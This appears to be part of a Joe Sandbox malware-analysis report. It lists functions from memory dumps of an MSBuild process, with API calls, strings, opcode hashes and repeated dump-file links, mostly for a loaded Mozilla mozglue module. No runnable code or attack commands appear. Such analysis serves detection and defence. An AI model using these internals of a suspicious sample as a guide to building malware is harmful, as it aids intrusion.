Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd0dd478d9f607c979a352132b68459f789e2a2a0c4ffcb15ea7dc3a842640c
Instruction ID: c1de0727e8417f3a856ade1607230127397a68712c8c4452783f7dfbc6220367
Opcode Fuzzy Hash: 1cd0dd478d9f607c979a352132b68459f789e2a2a0c4ffcb15ea7dc3a842640c
Instruction Fuzzy Hash: D7514F71901240BFCA617BAE854DEF5B2D6AFA0328F14048FB404AA272DF6D8DD05D6D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 352223032d3244ad9dc512ea0f38e2caed61f8f95f67dbfdd7722c11f9f2bd61
Instruction ID: 70aa0c5f5db09bd9b177b6aa788367f122bed66c5b4d8e76533133e42ab6cc8a
Opcode Fuzzy Hash: 352223032d3244ad9dc512ea0f38e2caed61f8f95f67dbfdd7722c11f9f2bd61
Instruction Fuzzy Hash: B3F03AB2E0015DABDB15DF78DC909EEB7FCEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 0041C440 Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041C451

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction ID: b821a3ed68e39ced0a1ee7d52ccadc00ba9e28cef2c83c113185a37151cab313
Opcode Fuzzy Hash: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction Fuzzy Hash: A221F6742007108FC320DF6ED495996B7F1FF49314B14486EEA8A8B722D776E880CB15

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C4A6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C4A6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C4A6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C4A6D26

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C4A6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C4A6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C4A6D73
free.MOZGLUE(00000000), ref: 6C4A6D80
CertGetNameStringW.CRYPT32 ref: 6C4A6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C4A6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C4A6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C4A6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C4A6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C4A6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C4A6E34
CreateFileW.KERNEL32 ref: 6C4A6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C4A6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C4A6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C4A709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C4A7103
free.MOZGLUE(00000000), ref: 6C4A7153
CloseHandle.KERNEL32(?), ref: 6C4A7176
__Init_thread_footer.LIBCMT ref: 6C4A7209
__Init_thread_footer.LIBCMT ref: 6C4A723A
__Init_thread_footer.LIBCMT ref: 6C4A726B
__Init_thread_footer.LIBCMT ref: 6C4A729C
__Init_thread_footer.LIBCMT ref: 6C4A72DC
__Init_thread_footer.LIBCMT ref: 6C4A730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C4A73C2
VerSetConditionMask.NTDLL ref: 6C4A73F3
VerSetConditionMask.NTDLL ref: 6C4A73FF
VerSetConditionMask.NTDLL ref: 6C4A7406
VerSetConditionMask.NTDLL ref: 6C4A740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C4A741A
moz_xmalloc.MOZGLUE(?), ref: 6C4A755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4A7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C4A7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C4A7598
free.MOZGLUE(00000000), ref: 6C4A75AC

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

Strings

SHA256, xrefs: 6C4A6EC0
wintrust.dll, xrefs: 6C4A72CD
(, xrefs: 6C4A768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C4A72C8

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 1b0f976593301847e4e3a003479ca6977243b47f3efd3ca3dd1e2063d653b51d
Instruction ID: c6bc131798e575015ec3a9670c871a20a29fbdf2c0d9a0510e8aa9645e11fc28
Opcode Fuzzy Hash: 1b0f976593301847e4e3a003479ca6977243b47f3efd3ca3dd1e2063d653b51d
Instruction Fuzzy Hash: 0152F6B1A042149FEB21DF64CC89FAA77B8EF55304F114199E908A7B44DB70AF86CF91

Function 6C4DF070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4DF09B

Part of subcall function 6C4B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B85
Part of subcall function 6C4B5B50: EnterCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B90
Part of subcall function 6C4B5B50: LeaveCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5BD8
Part of subcall function 6C4B5B50: GetTickCount64.KERNEL32 ref: 6C4B5BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C4DF0AC

Part of subcall function 6C4B5C50: GetTickCount64.KERNEL32 ref: 6C4B5D40
Part of subcall function 6C4B5C50: EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4B5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C4DF0BE

Part of subcall function 6C4B5C50: __aulldiv.LIBCMT ref: 6C4B5DB4
Part of subcall function 6C4B5C50: LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4B5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C4DF155
GetCurrentThreadId.KERNEL32 ref: 6C4DF1E0
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF1ED
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF212
GetCurrentThreadId.KERNEL32 ref: 6C4DF229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C4DF248
GetCurrentThreadId.KERNEL32 ref: 6C4DF2AE
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF2BB
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF2F8

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DF350
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF35D
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF381
GetCurrentThreadId.KERNEL32 ref: 6C4DF398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF3A0
GetCurrentThreadId.KERNEL32 ref: 6C4DF489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF491

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C4DF3CF

Part of subcall function 6C4DF070: GetCurrentThreadId.KERNEL32 ref: 6C4DF440
Part of subcall function 6C4DF070: AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF44D
Part of subcall function 6C4DF070: ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C4DF4A8
GetCurrentThreadId.KERNEL32 ref: 6C4DF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF561
GetCurrentThreadId.KERNEL32 ref: 6C4DF577
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF585
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C4DF3A8
[I %d/%d] profiler_resume, xrefs: 6C4DF239
[I %d/%d] profiler_resume_sampling, xrefs: 6C4DF499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C4DF56A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 63e21789afa51b25ac704fbf8987f8bb2fa4a677159b8f57aa3f310ec8cc3922
Instruction ID: 9defe34af89a555a10d4a3882ebd2aa636760e7d0348dca32ec362ee2251f4c3
Opcode Fuzzy Hash: 63e21789afa51b25ac704fbf8987f8bb2fa4a677159b8f57aa3f310ec8cc3922
Instruction Fuzzy Hash: 64D127757042009FEB10EF69DC2EF997BF4AB46328F06061DE91983F81DB716804C7AA

Function 6C4A64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C4A64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C4A64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C4A6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C4A6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C4A652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C4A671C
GetCurrentProcess.KERNEL32 ref: 6C4A6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C4A672F
GetCurrentProcess.KERNEL32 ref: 6C4A6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C4A6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C4A6A80
GetSystemInfo.KERNEL32(?), ref: 6C4A6ABE
__Init_thread_footer.LIBCMT ref: 6C4A6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4A6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4A6AF7

Strings

nvdxgiwrap.dll, xrefs: 6C4A6513
_etoured.dll, xrefs: 6C4A64ED
detoured.dll, xrefs: 6C4A64DA
nvd3d9wrap.dll, xrefs: 6C4A6500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C4A6798
user32.dll, xrefs: 6C4A6526

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 0c397c80de2cae99d2a4a168172b2c81760d8fe0f0bc217749a5756aa99eb8d6
Instruction ID: 5beac54ade051198f2fbcbac6c7306f4d244bf529255fe6de1e781be6147d27d
Opcode Fuzzy Hash: 0c397c80de2cae99d2a4a168172b2c81760d8fe0f0bc217749a5756aa99eb8d6
Instruction Fuzzy Hash: 69F10470A052199FDB20CFA8CC48FDAB7B5AF16319F144298D819E3B44D731AE86CF95

Function 6C4A7810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E744), ref: 6C4A7885
LeaveCriticalSection.KERNEL32(6C51E744), ref: 6C4A78A5
EnterCriticalSection.KERNEL32(6C51E784), ref: 6C4A78AD
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C4A78CD
EnterCriticalSection.KERNEL32(6C51E7DC), ref: 6C4A78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C4A78E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C4A795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C4A79BB
LeaveCriticalSection.KERNEL32(?), ref: 6C4A7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C4A7C82
LeaveCriticalSection.KERNEL32(6C51E7DC), ref: 6C4A7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C4A7DAF

Strings

DQl, xrefs: 6C4A787F
DQl, xrefs: 6C4A789F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: DQl$DQl
API String ID: 759993129-2010856505
Opcode ID: a4d7c64edd8f422244e42b78aa435a11e40a988b6d60326279fa90b19ec9bc99
Instruction ID: 09bea80063f51e4c3dc2ecae1a912a2e85b7d40d5f6de222fa3c91bed472d7c4
Opcode Fuzzy Hash: a4d7c64edd8f422244e42b78aa435a11e40a988b6d60326279fa90b19ec9bc99
Instruction Fuzzy Hash: 7F02A470A052198FDB64CF58C988F99B7B5FF98318F1582AAD809A7719D730BD91CF80

Function 6C4D7E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

(pre-xul), xrefs: 6C4D7E88
schema, xrefs: 6C4D81E3, 6C4D8311
name, xrefs: 6C4D7ECF, 6C4D8335
data, xrefs: 6C4D8280, 6C4D83E1
vQl, xrefs: 6C4D8207

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vQl
API String ID: 3412268980-818367301
Opcode ID: 2defb560df26c255a495accd7012c1c6f5343fd3b9de8a8f58384576cbd7dfbc
Instruction ID: dbb27f30b92537df11060c5276a42d776dc78d080c87c307c63d8fee6c27fef1
Opcode Fuzzy Hash: 2defb560df26c255a495accd7012c1c6f5343fd3b9de8a8f58384576cbd7dfbc
Instruction Fuzzy Hash: 86E18F71B043408FD714CF68C841A6BFBEABB95314F154A2DE895E7780DBB0ED098B91

Function 6C4BD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD4F2
LeaveCriticalSection.KERNEL32(6C51E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD50B

Part of subcall function 6C49CFE0: EnterCriticalSection.KERNEL32(6C51E784), ref: 6C49CFF6
Part of subcall function 6C49CFE0: LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C49D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C4CD1C5), ref: 6C4BD52E
EnterCriticalSection.KERNEL32(6C51E7DC), ref: 6C4BD690
